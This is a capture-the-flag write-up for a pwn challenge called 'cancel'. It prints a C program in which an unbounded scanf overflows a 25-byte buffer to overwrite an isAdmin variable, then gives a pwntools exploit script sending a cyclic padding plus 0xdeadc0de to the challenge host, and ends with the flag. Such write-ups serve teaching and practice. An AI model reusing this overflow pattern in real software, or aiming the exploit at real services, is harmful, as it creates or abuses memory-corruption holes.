AUCHALL - [Pwn] - cancel
Challenge Description
I'm not sure what this does, but it seems to be vulnerable to something.
Solution
First thing we would check is binary protections
Only NX is enabled which means that we cannot execute our shellcode
PIE is disabled
On checking source code I found out that we need to change isAdmin to
0xdeadc0de
Source Code
#include <stdio.h>
void win(void) {
FILE *file;
char line[100];
file = fopen("/flag", "r");
if (file == NULL) {
puts("[FAIL] Contact an admin.\n");
exit(1);
}
while (fgets(line, sizeof(line), file) != NULL) {
puts(line);
}
fclose(file);
}
void vuln() {
int isAdmin = 0;
char buffer[25];
char _admin;
fflush(stdout);
printf("Hi, are you an admin? (y/n)? ");
fflush(stdout);
scanf("%c", &_admin);
if (_admin == 'y') {
printf("Ok, you are an admin. What's the password? ");
fflush(stdout);
scanf("%s", buffer);
if (isAdmin == 0xdeadc0de) {
win();
} else {
printf("Sorry, you are not an admin.\n");
}
} else {
printf("Ok, you are not an admin.\n");
}
}
int main() {
setbuf(stdin, NULL);
setbuf(stdout, NULL);
setbuf(stderr, NULL);
vuln();
}
isAdmin comes after 25 offset
Solution
I made a simple pwntools script to get this working
from pwn import *
io = remote('section-b.cy243l.ooguy.com', PORT)
print(io.recv())
print(io.sendline(b'y'))
print(io.recv())
payload = cyclic(25) + p64(int("0xdeadc0de", 16))
print(io.sendline(payload))
print(io.recv())
io.interactive()
Flag
Flag is dynamic
CY243L{0v3rwr1t1ng_th3se_varsss_CCdEFbA_Z5Ue_Jkei}
Writeups 2023 © RootxRAN.